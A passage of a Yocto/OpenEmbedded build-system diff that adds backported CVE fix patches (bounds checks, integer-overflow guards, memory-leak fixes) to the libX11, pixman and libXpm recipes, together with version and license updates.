290@@ -46,6 +47,8 @@ int flags) /* DoRed, DoGreen, DoBlue */
291 XcmsColor cmsColor_exact;
292 XColor scr_def;
293
294+ if (strlen(name) >= USHRT_MAX)
295+ return 0;
296 #ifdef XCMS
297 /*
298 * Let's Attempt to use Xcms approach to Parse Color
299diff --git a/src/StName.c b/src/StName.c
300index b4048bff..5a632d0c 100644
301--- a/src/StName.c
302+++ b/src/StName.c
303@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
304 #ifdef HAVE_CONFIG_H
305 #include <config.h>
306 #endif
307+#include <limits.h>
308 #include <X11/Xlibint.h>
309 #include <X11/Xatom.h>
310
311@@ -36,7 +37,9 @@ XStoreName (
312 Window w,
313 _Xconst char *name)
314 {
315- return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING,
316+ if (strlen(name) >= USHRT_MAX)
317+ return 0;
318+ return XChangeProperty(dpy, w, XA_WM_NAME, XA_STRING, /* */
319 8, PropModeReplace, (_Xconst unsigned char *)name,
320 name ? strlen(name) : 0);
321 }
322@@ -47,6 +50,8 @@ XSetIconName (
323 Window w,
324 _Xconst char *icon_name)
325 {
326+ if (strlen(icon_name) >= USHRT_MAX)
327+ return 0;
328 return XChangeProperty(dpy, w, XA_WM_ICON_NAME, XA_STRING, 8,
329 PropModeReplace, (_Xconst unsigned char *)icon_name,
330 icon_name ? strlen(icon_name) : 0);
331--
3322.32.0
333
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
new file mode 100644
index 0000000000..fb61195225
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch
@@ -0,0 +1,58 @@
1From 8b51d1375a4dd6a7cf3a919da83d8e87e57e7333 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Wed, 2 Nov 2022 17:04:15 +0530
4Subject: [PATCH] CVE-2022-3554
5
6Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/1d11822601fd24a396b354fa616b04ed3df8b4ef]
7CVE: CVE-2022-3554
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10fix a memory leak in XRegisterIMInstantiateCallback
11
12Analysis:
13
14 _XimRegisterIMInstantiateCallback() opens an XIM and closes it using
15 the internal function pointers, but the internal close function does
16 not free the pointer to the XIM (this would be done in XCloseIM()).
17
18Report/patch:
19
20 Date: Mon, 03 Oct 2022 18:47:32 +0800
21 From: Po Lu <luangruo@yahoo.com>
22 To: xorg-devel@lists.x.org
23 Subject: Re: Yet another leak in Xlib
24
25 For reference, here's how I'm calling XRegisterIMInstantiateCallback:
26
27 XSetLocaleModifiers ("");
28 XRegisterIMInstantiateCallback (compositor.display,
29 XrmGetDatabase (compositor.display),
30 (char *) compositor.resource_name,
31 (char *) compositor.app_name,
32 IMInstantiateCallback, NULL);
33 and XMODIFIERS is:
34
35 @im=ibus
36
37Signed-off-by: Thomas E. Dickey's avatarThomas E. Dickey <dickey@invisible-island.net>
38---
39 modules/im/ximcp/imInsClbk.c | 3 +++
40 1 file changed, 3 insertions(+)
41
42diff --git a/modules/im/ximcp/imInsClbk.c b/modules/im/ximcp/imInsClbk.c
43index 961aaba..0a8a874 100644
44--- a/modules/im/ximcp/imInsClbk.c
45+++ b/modules/im/ximcp/imInsClbk.c
46@@ -204,6 +204,9 @@ _XimRegisterIMInstantiateCallback(
47 if( xim ) {
48 lock = True;
49 xim->methods->close( (XIM)xim );
50+ /* XIMs must be freed manually after being opened; close just
51+ does the protocol to deinitialize the IM. */
52+ XFree( xim );
53 lock = False;
54 icb->call = True;
55 callback( display, client_data, NULL );
56--
572.25.1
58
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
new file mode 100644
index 0000000000..855ce80e77
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch
@@ -0,0 +1,38 @@
1From 8a368d808fec166b5fb3dfe6312aab22c7ee20af Mon Sep 17 00:00:00 2001
2From: Hodong <hodong@yozmos.com>
3Date: Thu, 20 Jan 2022 00:57:41 +0900
4Subject: [PATCH] Fix two memory leaks in _XFreeX11XCBStructure()
5
6Even when XCloseDisplay() was called, some memory was leaked.
7
8XCloseDisplay() calls _XFreeDisplayStructure(), which calls
9_XFreeX11XCBStructure().
10
11However, _XFreeX11XCBStructure() did not destroy the condition variables,
12resulting in the leaking of some 40 bytes.
13
14Signed-off-by: Hodong <hodong@yozmos.com>
15
16Upstream-Status: Backport from [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8a368d808fec166b5fb3dfe6312aab22c7ee20af]
17CVE:CVE-2022-3555
18Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
19---
20 src/xcb_disp.c | 2 ++
21 1 file changed, 2 insertions(+)
22
23diff --git a/src/xcb_disp.c b/src/xcb_disp.c
24index 70a602f4..e9becee3 100644
25--- a/src/xcb_disp.c
26+++ b/src/xcb_disp.c
27@@ -102,6 +102,8 @@ void _XFreeX11XCBStructure(Display *dpy)
28 dpy->xcb->pending_requests = tmp->next;
29 free(tmp);
30 }
31+ xcondition_clear(dpy->xcb->event_notify);
32+ xcondition_clear(dpy->xcb->reply_notify);
33 xcondition_free(dpy->xcb->event_notify);
34 xcondition_free(dpy->xcb->reply_notify);
35 Xfree(dpy->xcb);
36--
372.18.2
38
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
new file mode 100644
index 0000000000..c724cf8fdd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch
@@ -0,0 +1,111 @@
1From 304a654a0d57bf0f00d8998185f0360332cfa36c Mon Sep 17 00:00:00 2001
2From: Alan Coopersmith <alan.coopersmith@oracle.com>
3Date: Sat, 10 Jun 2023 16:30:07 -0700
4Subject: [PATCH] InitExt.c: Add bounds checks for extension request, event, &
5 error codes
6
7Fixes CVE-2023-3138: X servers could return values from XQueryExtension
8that would cause Xlib to write entries out-of-bounds of the arrays to
9store them, though this would only overwrite other parts of the Display
10struct, not outside the bounds allocated for that structure.
11
12Reported-by: Gregory James DUCK <gjduck@gmail.com>
13Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
14
15CVE: CVE-2023-3138
16Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/304a654a0d57bf0f00d8998185f0360332cfa36c.patch]
17Signed-off-by: Poonam Jadhav <poonam.jadhav@kpit.com>
18---
19 src/InitExt.c | 42 ++++++++++++++++++++++++++++++++++++++++++
20 1 file changed, 42 insertions(+)
21
22diff --git a/src/InitExt.c b/src/InitExt.c
23index 4de46f15..afc00a6b 100644
24--- a/src/InitExt.c
25+++ b/src/InitExt.c
26@@ -33,6 +33,18 @@ from The Open Group.
27 #include <X11/Xos.h>
28 #include <stdio.h>
29
30+/* The X11 protocol spec reserves events 64 through 127 for extensions */
31+#ifndef LastExtensionEvent
32+#define LastExtensionEvent 127
33+#endif
34+
35+/* The X11 protocol spec reserves requests 128 through 255 for extensions */
36+#ifndef LastExtensionRequest
37+#define FirstExtensionRequest 128
38+#define LastExtensionRequest 255
39+#endif
40+
41+
42 /*
43 * This routine is used to link a extension in so it will be called
44 * at appropriate times.
45@@ -242,6 +254,12 @@ WireToEventType XESetWireToEvent(
46 WireToEventType proc) /* routine to call when converting event */
47 {
48 register WireToEventType oldproc;
49+ if (event_number < 0 ||
50+ event_number > LastExtensionEvent) {
51+ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
52+ event_number);
53+ return (WireToEventType)_XUnknownWireEvent;
54+ }
55 if (proc == NULL) proc = (WireToEventType)_XUnknownWireEvent;
56 LockDisplay (dpy);
57 oldproc = dpy->event_vec[event_number];
58@@ -263,6 +281,12 @@ WireToEventCookieType XESetWireToEventCookie(
59 )
60 {
61 WireToEventCookieType oldproc;
62+ if (extension < FirstExtensionRequest ||
63+ extension > LastExtensionRequest) {
64+ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
65+ extension);
66+ return (WireToEventCookieType)_XUnknownWireEventCookie;
67+ }
68 if (proc == NULL) proc = (WireToEventCookieType)_XUnknownWireEventCookie;
69 LockDisplay (dpy);
70 oldproc = dpy->generic_event_vec[extension & 0x7F];
71@@ -284,6 +308,12 @@ CopyEventCookieType XESetCopyEventCookie(
72 )
73 {
74 CopyEventCookieType oldproc;
75+ if (extension < FirstExtensionRequest ||
76+ extension > LastExtensionRequest) {
77+ fprintf(stderr, "Xlib: ignoring invalid extension opcode %d\n",
78+ extension);
79+ return (CopyEventCookieType)_XUnknownCopyEventCookie;
80+ }
81 if (proc == NULL) proc = (CopyEventCookieType)_XUnknownCopyEventCookie;
82 LockDisplay (dpy);
83 oldproc = dpy->generic_event_copy_vec[extension & 0x7F];
84@@ -305,6 +335,12 @@ EventToWireType XESetEventToWire(
85 EventToWireType proc) /* routine to call when converting event */
86 {
87 register EventToWireType oldproc;
88+ if (event_number < 0 ||
89+ event_number > LastExtensionEvent) {
90+ fprintf(stderr, "Xlib: ignoring invalid extension event %d\n",
91+ event_number);
92+ return (EventToWireType)_XUnknownNativeEvent;
93+ }
94 if (proc == NULL) proc = (EventToWireType) _XUnknownNativeEvent;
95 LockDisplay (dpy);
96 oldproc = dpy->wire_vec[event_number];
97@@ -325,6 +361,12 @@ WireToErrorType XESetWireToError(
98 WireToErrorType proc) /* routine to call when converting error */
99 {
100 register WireToErrorType oldproc = NULL;
101+ if (error_number < 0 ||
102+ error_number > LastExtensionError) {
103+ fprintf(stderr, "Xlib: ignoring invalid extension error %d\n",
104+ error_number);
105+ return (WireToErrorType)_XDefaultWireError;
106+ }
107 if (proc == NULL) proc = (WireToErrorType)_XDefaultWireError;
108 LockDisplay (dpy);
109 if (!dpy->error_vec) {
110--
111GitLab
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
new file mode 100644
index 0000000000..dbdf096fc8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch
@@ -0,0 +1,63 @@
1From 6858d468d9ca55fb4c5fd70b223dbc78a3358a7f Mon Sep 17 00:00:00 2001
2From: Alan Coopersmith <alan.coopersmith@oracle.com>
3Date: Sun, 17 Sep 2023 14:19:40 -0700
4Subject: [PATCH libX11 1/5] CVE-2023-43785: out-of-bounds memory access in
5 _XkbReadKeySyms()
6
7Make sure we allocate enough memory in the first place, and
8also handle error returns from _XkbReadBufferCopyKeySyms() when
9it detects out-of-bounds issues.
10
11Reported-by: Gregory James DUCK <gjduck@gmail.com>
12Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
13
14Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0001-CVE-2023-43785-out-of-bounds-memory-access-in-_XkbRe.patch?h=ubuntu/focal-security
15Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/6858d468d9ca55fb4c5fd70b223dbc78a3358a7f]
16CVE: CVE-2023-43785
17Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
18---
19 src/xkb/XKBGetMap.c | 14 +++++++++-----
20 1 file changed, 9 insertions(+), 5 deletions(-)
21
22diff --git a/src/xkb/XKBGetMap.c b/src/xkb/XKBGetMap.c
23index 2891d21e..31199e4a 100644
24--- a/src/xkb/XKBGetMap.c
25+++ b/src/xkb/XKBGetMap.c
26@@ -182,7 +182,8 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
27 if (offset + newMap->nSyms >= map->size_syms) {
28 register int sz;
29
30- sz = map->size_syms + 128;
31+ sz = offset + newMap->nSyms;
32+ sz = ((sz + (unsigned) 128) / 128) * 128;
33 _XkbResizeArray(map->syms, map->size_syms, sz, KeySym);
34 if (map->syms == NULL) {
35 map->size_syms = 0;
36@@ -191,8 +192,9 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
37 map->size_syms = sz;
38 }
39 if (newMap->nSyms > 0) {
40- _XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
41- newMap->nSyms);
42+ if (_XkbReadBufferCopyKeySyms(buf, (KeySym *) &map->syms[offset],
43+ newMap->nSyms) == 0)
44+ return BadLength;
45 offset += newMap->nSyms;
46 }
47 else {
48@@ -222,8 +224,10 @@ _XkbReadKeySyms(XkbReadBufferPtr buf, XkbDescPtr xkb, xkbGetMapReply *rep)
49 newSyms = XkbResizeKeySyms(xkb, i + rep->firstKeySym, tmp);
50 if (newSyms == NULL)
51 return BadAlloc;
52- if (newMap->nSyms > 0)
53- _XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms);
54+ if (newMap->nSyms > 0) {
55+ if (_XkbReadBufferCopyKeySyms(buf, newSyms, newMap->nSyms) == 0)
56+ return BadLength;
57+ }
58 else
59 newSyms[0] = NoSymbol;
60 oldMap->kt_index[0] = newMap->ktIndex[0];
61--
622.39.3
63
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
new file mode 100644
index 0000000000..31a99eb4ac
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
@@ -0,0 +1,42 @@
1From 204c3393c4c90a29ed6bef64e43849536e863a86 Mon Sep 17 00:00:00 2001
2From: Alan Coopersmith <alan.coopersmith@oracle.com>
3Date: Thu, 7 Sep 2023 15:54:30 -0700
4Subject: [PATCH libX11 2/5] CVE-2023-43786: stack exhaustion from infinite
5 recursion in PutSubImage()
6
7When splitting a single line of pixels into chunks to send to the
8X server, be sure to take into account the number of bits per pixel,
9so we don't just loop forever trying to send more pixels than fit in
10the given request size and not breaking them down into a small enough
11chunk to fix.
12
13Fixes: "almost complete rewrite" (Dec. 12, 1987) from X11R2
14Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
15
16Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0002-CVE-2023-43786-stack-exhaustion-from-infinite-recurs.patch?h=ubuntu/focal-security
17Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/204c3393c4c90a29ed6bef64e43849536e863a86]
18CVE: CVE-2023-43786
19Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
20---
21 src/PutImage.c | 5 +++--
22 1 file changed, 3 insertions(+), 2 deletions(-)
23
24diff --git a/src/PutImage.c b/src/PutImage.c
25index 857ee916..a6db7b42 100644
26--- a/src/PutImage.c
27+++ b/src/PutImage.c
28@@ -914,8 +914,9 @@ PutSubImage (
29 req_width, req_height - SubImageHeight,
30 dest_bits_per_pixel, dest_scanline_pad);
31 } else {
32- int SubImageWidth = (((Available << 3) / dest_scanline_pad)
33- * dest_scanline_pad) - left_pad;
34+ int SubImageWidth = ((((Available << 3) / dest_scanline_pad)
35+ * dest_scanline_pad) - left_pad)
36+ / dest_bits_per_pixel;
37
38 PutSubImage(dpy, d, gc, image, req_xoffset, req_yoffset, x, y,
39 (unsigned int) SubImageWidth, 1,
40--
412.39.3
42
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
new file mode 100644
index 0000000000..4800bedf41
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
@@ -0,0 +1,46 @@
1From 73a37d5f2fcadd6540159b432a70d80f442ddf4a Mon Sep 17 00:00:00 2001
2From: Alan Coopersmith <alan.coopersmith@oracle.com>
3Date: Thu, 7 Sep 2023 15:55:04 -0700
4Subject: [PATCH libX11 3/5] XPutImage: clip images to maximum height & width
5 allowed by protocol
6
7The PutImage request specifies height & width of the image as CARD16
8(unsigned 16-bit integer), same as the maximum dimensions of an X11
9Drawable, which the image is being copied to.
10
11Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
12
13Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0003-XPutImage-clip-images-to-maximum-height-width-allowe.patch?h=ubuntu/focal-security
14Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/73a37d5f2fcadd6540159b432a70d80f442ddf4a]
15CVE: CVE-2023-43786
16Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
17---
18 src/PutImage.c | 5 +++++
19 1 file changed, 5 insertions(+)
20
21diff --git a/src/PutImage.c b/src/PutImage.c
22index a6db7b42..ba411e36 100644
23--- a/src/PutImage.c
24+++ b/src/PutImage.c
25@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
26 #include "Xlibint.h"
27 #include "Xutil.h"
28 #include <stdio.h>
29+#include <limits.h>
30 #include "Cr.h"
31 #include "ImUtil.h"
32 #include "reallocarray.h"
33@@ -962,6 +963,10 @@ XPutImage (
34 height = image->height - req_yoffset;
35 if ((width <= 0) || (height <= 0))
36 return 0;
37+ if (width > USHRT_MAX)
38+ width = USHRT_MAX;
39+ if (height > USHRT_MAX)
40+ height = USHRT_MAX;
41
42 if ((image->bits_per_pixel == 1) || (image->format != ZPixmap)) {
43 dest_bits_per_pixel = 1;
44--
452.39.3
46
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
new file mode 100644
index 0000000000..d35d96c4dc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
@@ -0,0 +1,52 @@
1From b4031fc023816aca07fbd592ed97010b9b48784b Mon Sep 17 00:00:00 2001
2From: Alan Coopersmith <alan.coopersmith@oracle.com>
3Date: Thu, 7 Sep 2023 16:12:27 -0700
4Subject: [PATCH libX11 4/5] XCreatePixmap: trigger BadValue error for
5 out-of-range dimensions
6
7The CreatePixmap request specifies height & width of the image as CARD16
8(unsigned 16-bit integer), so if either is larger than that, set it to 0
9so the X server returns a BadValue error as the protocol requires.
10
11Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
12
13Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0004-XCreatePixmap-trigger-BadValue-error-for-out-of-rang.patch?h=ubuntu/focal-security
14Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/b4031fc023816aca07fbd592ed97010b9b48784b]
15CVE: CVE-2023-43787
16Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
17---
18 src/CrPixmap.c | 11 +++++++++++
19 1 file changed, 11 insertions(+)
20
21diff --git a/src/CrPixmap.c b/src/CrPixmap.c
22index cdf31207..3cb2ca6d 100644
23--- a/src/CrPixmap.c
24+++ b/src/CrPixmap.c
25@@ -28,6 +28,7 @@ in this Software without prior written authorization from The Open Group.
26 #include <config.h>
27 #endif
28 #include "Xlibint.h"
29+#include <limits.h>
30
31 #ifdef USE_DYNAMIC_XCURSOR
32 void
33@@ -47,6 +48,16 @@ Pixmap XCreatePixmap (
34 Pixmap pid;
35 register xCreatePixmapReq *req;
36
37+ /*
38+ * Force a BadValue X Error if the requested dimensions are larger
39+ * than the X11 protocol has room for, since that's how callers expect
40+ * to get notified of errors.
41+ */
42+ if (width > USHRT_MAX)
43+ width = 0;
44+ if (height > USHRT_MAX)
45+ height = 0;
46+
47 LockDisplay(dpy);
48 GetReq(CreatePixmap, req);
49 req->drawable = d;
50--
512.39.3
52
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
new file mode 100644
index 0000000000..110bd445df
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
@@ -0,0 +1,64 @@
1From 7916869d16bdd115ac5be30a67c3749907aea6a0 Mon Sep 17 00:00:00 2001
2From: Yair Mizrahi <yairm@jfrog.com>
3Date: Thu, 7 Sep 2023 16:15:32 -0700
4Subject: [PATCH libX11 5/5] CVE-2023-43787: Integer overflow in XCreateImage()
5 leading to a heap overflow
6
7When the format is `Pixmap` it calculates the size of the image data as:
8 ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
9There is no validation on the `width` of the image, and so this
10calculation exceeds the capacity of a 4-byte integer, causing an overflow.
11
12Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
13
14Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0005-CVE-2023-43787-Integer-overflow-in-XCreateImage-lead.patch?h=ubuntu/focal-security
15Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/7916869d16bdd115ac5be30a67c3749907aea6a0]
16CVE: CVE-2023-43787
17Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
18---
19 src/ImUtil.c | 20 +++++++++++++++-----
20 1 file changed, 15 insertions(+), 5 deletions(-)
21
22diff --git a/src/ImUtil.c b/src/ImUtil.c
23index 36f08a03..fbfad33e 100644
24--- a/src/ImUtil.c
25+++ b/src/ImUtil.c
26@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
27 #include <X11/Xlibint.h>
28 #include <X11/Xutil.h>
29 #include <stdio.h>
30+#include <limits.h>
31 #include "ImUtil.h"
32
33 static int _XDestroyImage(XImage *);
34@@ -361,13 +362,22 @@ XImage *XCreateImage (
35 /*
36 * compute per line accelerator.
37 */
38- {
39- if (format == ZPixmap)
40+ if (format == ZPixmap) {
41+ if ((INT_MAX / bits_per_pixel) < width) {
42+ Xfree(image);
43+ return NULL;
44+ }
45+
46 min_bytes_per_line =
47- ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
48- else
49+ ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
50+ } else {
51+ if ((INT_MAX - offset) < width) {
52+ Xfree(image);
53+ return NULL;
54+ }
55+
56 min_bytes_per_line =
57- ROUNDUP((width + offset), image->bitmap_pad);
58+ ROUNDUP((width + offset), image->bitmap_pad);
59 }
60 if (image_bytes_per_line == 0) {
61 image->bytes_per_line = min_bytes_per_line;
62--
632.39.3
64
diff --git a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
index ebd2640743..248889a1d4 100644
--- a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
+++ b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
@@ -15,6 +15,15 @@ SRC_URI += "file://Fix-hanging-issue-in-_XReply.patch \
15 file://libx11-whitespace.patch \ 15 file://libx11-whitespace.patch \
16 file://CVE-2020-14344.patch \ 16 file://CVE-2020-14344.patch \
17 file://CVE-2020-14363.patch \ 17 file://CVE-2020-14363.patch \
18 file://CVE-2021-31535.patch \
19 file://CVE-2022-3554.patch \
20 file://CVE-2022-3555.patch \
21 file://CVE-2023-3138.patch \
22 file://CVE-2023-43785.patch \
23 file://CVE-2023-43786-1.patch \
24 file://CVE-2023-43786-2.patch \
25 file://CVE-2023-43787-1.patch \
26 file://CVE-2023-43787-2.patch \
18" 27"
19 28
20SRC_URI[md5sum] = "55adbfb6d4370ecac5e70598c4e7eed2" 29SRC_URI[md5sum] = "55adbfb6d4370ecac5e70598c4e7eed2"
diff --git a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
index fda8e32d2c..4694f911be 100644
--- a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb
+++ b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
@@ -11,17 +11,18 @@ an extension of the monochrome XBM bitmap specificied in the X \
11protocol." 11protocol."
12 12
13LICENSE = "MIT" 13LICENSE = "MIT"
14LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7" 14LIC_FILES_CHKSUM = "file://COPYING;md5=903942ebc9d807dfb68540f40bae5aff"
15DEPENDS += "libxext libsm libxt gettext-native" 15DEPENDS += "libxext libsm libxt gettext-native"
16PE = "1" 16PE = "1"
17 17
18XORG_PN = "libXpm" 18XORG_PN = "libXpm"
19XORG_EXT = "tar.xz"
20EXTRA_OECONF += "--disable-open-zfile"
19 21
20PACKAGES =+ "sxpm cxpm" 22PACKAGES =+ "sxpm cxpm"
21FILES_cxpm = "${bindir}/cxpm" 23FILES_cxpm = "${bindir}/cxpm"
22FILES_sxpm = "${bindir}/sxpm" 24FILES_sxpm = "${bindir}/sxpm"
23 25
24SRC_URI[md5sum] = "6f0ecf8d103d528cfc803aa475137afa" 26SRC_URI[sha256sum] = "64b31f81019e7d388c822b0b28af8d51c4622b83f1f0cb6fa3fc95e271226e43"
25SRC_URI[sha256sum] = "9cd1da57588b6cb71450eff2273ef6b657537a9ac4d02d0014228845b935ac25"
26 27
27BBCLASSEXTEND = "native" 28BBCLASSEXTEND = "native"
diff --git a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
index cc45696530..38cab99bbe 100644
--- a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
+++ b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
@@ -6,7 +6,7 @@ using file descriptor passing."
6 6
7require xorg-lib-common.inc 7require xorg-lib-common.inc
8 8
9LICENSE = "MIT-style" 9LICENSE = "HPND"
10LIC_FILES_CHKSUM = "file://COPYING;md5=47e508ca280fde97906eacb77892c3ac" 10LIC_FILES_CHKSUM = "file://COPYING;md5=47e508ca280fde97906eacb77892c3ac"
11 11
12DEPENDS += "virtual/libx11" 12DEPENDS += "virtual/libx11"
diff --git a/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
new file mode 100644
index 0000000000..d54ae16b33
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
@@ -0,0 +1,34 @@
1CVE: CVE-2022-44638
2Upstream-Status: Backport
3Signed-off-by: Ross Burton <ross.burton@arm.com>
4Signed-off-by:Bhabu Bindu <bhabu.bindu@kpit.com>
5
6From a1f88e842e0216a5b4df1ab023caebe33c101395 Mon Sep 17 00:00:00 2001
7From: Matt Turner <mattst88@gmail.com>
8Date: Wed, 2 Nov 2022 12:07:32 -0400
9Subject: [PATCH] Avoid integer overflow leading to out-of-bounds write
10
11Thanks to Maddie Stone and Google's Project Zero for discovering this
12issue, providing a proof-of-concept, and a great analysis.
13
14Closes: https://gitlab.freedesktop.org/pixman/pixman/-/issues/63
15---
16 pixman/pixman-trap.c | 2 +-
17 1 file changed, 1 insertion(+), 1 deletion(-)
18
19diff --git a/pixman/pixman-trap.c b/pixman/pixman-trap.c
20index 91766fd..7560405 100644
21--- a/pixman/pixman-trap.c
22+++ b/pixman/pixman-trap.c
23@@ -74,7 +74,7 @@ pixman_sample_floor_y (pixman_fixed_t y,
24
25 if (f < Y_FRAC_FIRST (n))
26 {
27- if (pixman_fixed_to_int (i) == 0x8000)
28+ if (pixman_fixed_to_int (i) == 0xffff8000)
29 {
30 f = 0; /* saturate */
31 }
32--
33GitLab
34
diff --git a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
index 22e19ba069..5873c19bab 100644
--- a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
+++ b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
@@ -10,6 +10,7 @@ DEPENDS = "zlib"
10SRC_URI = "https://www.cairographics.org/releases/${BP}.tar.gz \ 10SRC_URI = "https://www.cairographics.org/releases/${BP}.tar.gz \
11 file://0001-ARM-qemu-related-workarounds-in-cpu-features-detecti.patch \ 11 file://0001-ARM-qemu-related-workarounds-in-cpu-features-detecti.patch \
12 file://0001-test-utils-Check-for-FE_INVALID-definition-before-us.patch \ 12 file://0001-test-utils-Check-for-FE_INVALID-definition-before-us.patch \
13 file://CVE-2022-44638.patch \
13 " 14 "
14SRC_URI[md5sum] = "267a7af290f93f643a1bc74490d9fdd1" 15SRC_URI[md5sum] = "267a7af290f93f643a1bc74490d9fdd1"
15SRC_URI[sha256sum] = "da66d6fd6e40aee70f7bd02e4f8f76fc3f006ec879d346bae6a723025cfbdde7" 16SRC_URI[sha256sum] = "da66d6fd6e40aee70f7bd02e4f8f76fc3f006ec879d346bae6a723025cfbdde7"
diff --git a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
index a566eaa45e..1e8525d874 100644
--- a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
+++ b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
@@ -6,8 +6,9 @@ LICENSE = "MIT-X"
6DEPENDS = "util-macros" 6DEPENDS = "util-macros"
7 7
8XORG_PN = "${BPN}" 8XORG_PN = "${BPN}"
9XORG_EXT ?= "tar.bz2"
9 10
10SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.tar.bz2" 11SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.${XORG_EXT}"
11 12
